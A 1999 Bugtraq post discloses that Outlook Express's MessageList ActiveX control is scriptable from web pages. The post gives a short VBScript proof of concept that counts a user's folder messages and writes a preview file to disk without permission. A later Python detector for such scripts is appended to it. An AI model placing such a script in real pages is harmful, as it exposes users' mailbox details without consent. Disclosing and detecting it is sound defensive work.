List:       bugtraq
Subject:    Minor privacy exploit in Outlook Express
From:       "1nternal  () geocities ! com" <1nternal () MY-DEJANEWS ! COM>
Date:       1999-04-26 12:07:19

Outlook Express uses HTML to display certain information in the 'outlook today' type
part of Outlook Express, i.e., the number of unread messages in your inbox etc...

Because it is considered to be in the 'internet zone', this information needs to be
safely scriptable, thus it can be accessed by any site in this zone. This allows for
a possible (although admittedly minor) privacy and possibly security problem.

The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is
marked safe for scripting. It allows for counting the number of messages in any
folder within Outlook Express, as well as the number of unread items and a few other
things, such as setting options; however, the options are set for that instance
only and are not saved.

The following is an example of viewing the number of messages in a folder, as well as
previewing the message (creating the file 'C:\oe_prev$.eml' without the user's
permission). It should be noted that this preview message is not accessible remotely
(without an exploit).

<script language="VBSCRIPT"><!--

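' Instantiate the control that is marked safe for scripting
set MsgList = CreateObject("OutlookExpress.MessageList")
' Select a folder by its numeric id
MsgList.Folder = 6
' Display the number of messages in that folder
msgbox(MsgList.Count)
' Preview the message (this is what creates C:\oe_prev$.eml)
location.href = MsgList.PreviewMessage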

--></script>

Obviously, this could also be done in JavaScript; however, it would still require
ActiveX support and OE5.

1nternal@my-dejanews.com
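
Added example (not part of the original post): a content check that a mail gateway or web proxy could run to flag HTML that scripts the 'OutlookExpress.MessageList' control, covering both the VBScript form shown above and the JavaScript form the post mentions. The function name, the JScript sample and the benign sample are constructed for illustration; it assumes the ProgID appears as a literal string, so a script that assembles the name from pieces is not caught.

```python
import re

PROGID = "OutlookExpress.MessageList"            # ProgID named in the post
MEMBERS = ("Folder", "Count", "PreviewMessage")  # members the post's script uses

SCRIPT = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
LANG = re.compile(r"""\b(?:language|type)\s*=\s*["']?([^"'\s>]+)""", re.I)
# VBScript: [set] x = CreateObject("ProgID"); JScript: x = new ActiveXObject("ProgID")
CREATE = re.compile(
    r"""(\w+)\s*=\s*(?:new\s+)?(?:CreateObject|ActiveXObject)\s*\(\s*["']"""
    + re.escape(PROGID) + r"""["']\s*\)""", re.I)

def scan_html(html):
    """Return one finding per variable bound to the control inside a <script>."""
    findings = []
    for attrs, body in SCRIPT.findall(html):
        lang = LANG.search(attrs)
        for var in CREATE.findall(body):
            # Which of the control's members does the script touch via this variable?
            used = [m for m in MEMBERS
                    if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(var), m), body, re.I)]
            findings.append({"language": lang.group(1).lower() if lang else "unspecified",
                             "variable": var, "members": used})
    return findings

# Constructed samples: the post's VBScript, a JScript equivalent, a benign page.
VBS_PAGE = '''<script language="VBSCRIPT"><!--
set MsgList = CreateObject("OutlookExpress.MessageList")
MsgList.Folder = 6
msgbox(MsgList.Count)
location.href = MsgList.PreviewMessage
--></script>'''
JS_PAGE = """<script type="text/javascript">
var ml = new ActiveXObject('OutlookExpress.MessageList');
alert(ml.Count);
</script>"""
BENIGN = '<script>var d = new ActiveXObject("Scripting.Dictionary");</script>'

if __name__ == "__main__":
    for name, page in (("vbs", VBS_PAGE), ("js", JS_PAGE), ("benign", BENIGN)):
        print(name, scan_html(page))
```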